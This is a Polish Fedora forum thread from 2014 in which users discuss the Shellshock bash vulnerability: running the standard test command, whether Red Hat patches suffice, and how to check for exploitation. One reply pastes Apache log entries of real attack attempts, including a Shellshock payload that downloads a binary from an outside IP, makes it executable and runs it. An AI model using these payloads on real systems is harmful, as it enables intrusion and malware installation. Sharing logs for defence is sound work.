@WalDo Napisano Październik 4, 2014 Zgłoszenie Share Napisano Październik 4, 2014 Nie wiem czy czytaliście http://niebezpiecznik.pl/post/dziura-w-bashu/ Wykonałem jako zwykły user polecenie testujące: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" O ile w F20 [waldo@F20 ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test czyli - przynajmniej ja tak to rozumiem - jest bezpiecznie, to już w F21 tak fajnie nie jest: [waldo@localhost ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test mimo, że na stronie https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ piszą Update 2014-09-30 19:30 UTC Questions have arisen around whether Red Hat products are vulnerable to CVE-2014-6277 and CVE-2014-6278. We have determined that RHSA-2014:1306, RHSA-2014:1311, and RHSA-2014:1312 successfully mitigate the vulnerability and no additional actions need to be taken. Może jest tu na forum ktoś, kto specjalizuje się w bezpieczeństwie systemu i potrafi mi wyjaśnić dokładnie o co chodzi? Informacja z RH sugeruje, że wszystkie dziury zostały załatane, ale czy na pewno?Czy można jakoś sprawdzić czy ktoś nie wykorzystał tej dziury? [EDIT] Trochę zafałszowałem informację. Po zaktualizowaniu F21 wyglada na to, że F21 też jest OK, ale pytanie jest aktualne: czy można jakoś sprawdzić czy ktoś nie wykorzystał tej dziury? Akutualizuję system często, w zasadzie na bieżąco, ale niepokoi mnie co się mogło dziać między 25. lipca a 26. września [root@F20 log]# grep bash yum.log Jul 25 19:17:50 Updated: bash-4.2.47-3.fc20.x86_64 # "dziurawa" wersja Sep 26 13:43:59 Updated: bash-4.2.48-2.fc20.x86_64 # wersja "załatana" No i oczywiście ewidentny wniosek: aktualizować system tak często jak to się da, choćby i 3 razy dziennie.I jeszcze tylko pytanie czy jest jakiś sposób alarmowania o takich dziurach inny, lepszy niż śledzenie np. https://securityblog.redhat.com/ czy wspomnianego wyżej http://niebezpiecznik.pl/? Jeszcze tylko lektura: http://niebezpiecznik.pl/post/chinczycy-juz-wykorzystuja-dziure-w-bashu-do-atakow/ Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@sunrise Napisano Październik 4, 2014 Zgłoszenie Share Napisano Październik 4, 2014 Możesz sprawdzić logi serwera www, jeżeli serwer nie wykonuje żadnych skryptów cgi ,php lub inne które korzystają z basha to raczej nie masz się czego bać, dodatkowo jeżeli masz selinux to raczej bardzo mało prawdopodobne, aby ktoś wykorzystał dziurę http://danwalsh.livejournal.com/71122.html http://danwalsh.livejournal.com/71396.html Próby wykorzystania błędu u mnie, logi z apacha 09.126.230.72 - - [25/Sep/2014:01:48:47 +0200] "GET / HTTP/1.0" 200 1933 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" 89.207.135.125 - - [25/Sep/2014:10:38:27 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" 89.207.135.125 - - [25/Sep/2014:15:10:11 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" 54.251.83.67 - - [26/Sep/2014:04:34:41 +0200] "GET / HTTP/1.1" 200 1933 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" 54.251.83.67 - - [26/Sep/2014:23:32:34 +0200] "GET / HTTP/1.1" 200 1933 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" 70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET / HTTP/1.0" 200 1933 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET / HTTP/1.0" 200 1933 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" Ciekawy artykuł o błędzie https://badsector.pl/w-praktyce/artykuly/shellshock-i-opowiesc-o-srodowisku.174.html Co do stron proponuję również http://zaufanatrzeciastrona.pl/ Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
@WalDo Napisano Październik 5, 2014 Autor Zgłoszenie Share Napisano Październik 5, 2014 Dzięki za informacje. Mam tylko zwykła stację roboczą, nie wystawiam żadnych serwisów, więc pytanie z mojej strony ma przede wszystkim charakter poznawczy. Na wszelki wypadek przeleciałem logi i nic szczególnego na szczęście nie znajduję SElinux działa, chociaż z tego co ktoś tu kiedyś napisał na forum SElinux na workstation to przerost formy nad treścią i można wyłączyć. Można i przez jakiś czas miałem nawet wyłączony, ale potem stwierdziłem, że jednak jak już jest, to niech działa - w sumie nie przeszkadza mi to, czasem wymaga dodania jakiejś regułki zazwyczaj "podpowiadanej", więc nie ma problemu. Dzięki za linki. Odnośnik do komentarza Udostępnij na innych stronach More sharing options...
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się